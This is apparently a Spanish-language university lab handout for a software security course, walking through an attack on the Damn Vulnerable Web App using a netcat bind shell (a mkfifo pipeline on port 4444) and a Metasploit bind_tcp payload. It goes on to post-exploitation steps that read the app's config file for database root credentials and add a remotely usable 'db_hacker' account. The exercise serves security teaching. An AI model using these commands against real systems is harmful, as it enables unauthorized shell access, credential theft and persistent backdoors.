Documentos de Académico
Documentos de Profesional
Documentos de Cultura
LABORATORIO Nº 03
Ataque usando Metasploit
Objetivos de aprendizaje
Realizar un ataque de inyección usando DAMN VULNERABLE WEB APP y
METASPLOIT.
Describir el procedimiento.
ESCENARIO
1. DVWA
SELinux desactivado
Servicio Firewalld desactivado
Servicio Apache activo
Servicio MariaDB activo
Ingresar a DVWA
Definir Nivel de Seguridad del Sitio Web: Low
2. Ejecutar Netcat
Utilice (mkfifo /tmp/pipe;) para crear una llamada pipe que proporciona una forma de
IPC (Inter-Process Communication) que permita que varios lectores y escritores se
comuniquen entre sí.
Utilice (sh /tmp/pipe) para adjuntar una carcasa interactiva a la tubería nombrada
(/tmp/pipe).
Utilice (sh /tmp/pipe | nc -l 4444) para adjuntar el shell interactivo a la sesión de
netcat que escucha en el puerto 4444.
Utilice (nc -l 4444 > /tmp/pipe) para recibir la salida de la sesión de netcat (es decir,
los datos enviados por Kali Linux) y enviarlo a la entrada de la llamada pipe, donde se
convierte en entrada para el shell.
1
Seguridad en el software
msfconsole
1. use multi/handler
2. set PAYLOAD linux/x86/shell/bind_tcp
3. show options
4. set RHOST 192.168.1.9
5. exploit
2
Seguridad en el software
4) Iniciar sesión
sessions -i 1
1. whoami
3
Seguridad en el software
2. pwd
3. ls -ld /var/www/html
4. ls -ld /var/www/html/dvwa
5. ls -l /var/www/html/dvwa
4
Seguridad en el software
1. ls -l /var/www/html/dvwa/config
2. cat /var/www/html/dvwa/config/config.inc.php
o Bingo!!!
o Para el nombre de la base de datos dvwa, el usuario es
root y la contraseña es dvwaPASSWORD.
5
Seguridad en el software
4. Exploración de en MariaDB
6
Seguridad en el software
7
Seguridad en el software
8
Seguridad en el software
El registro db_hacker fue creado. Nota, se ha definido al Host el valor “%”, podrá iniciar sesión en la base de datos desde
cualquier lugar con conectividad
5. Prueba de laboratorio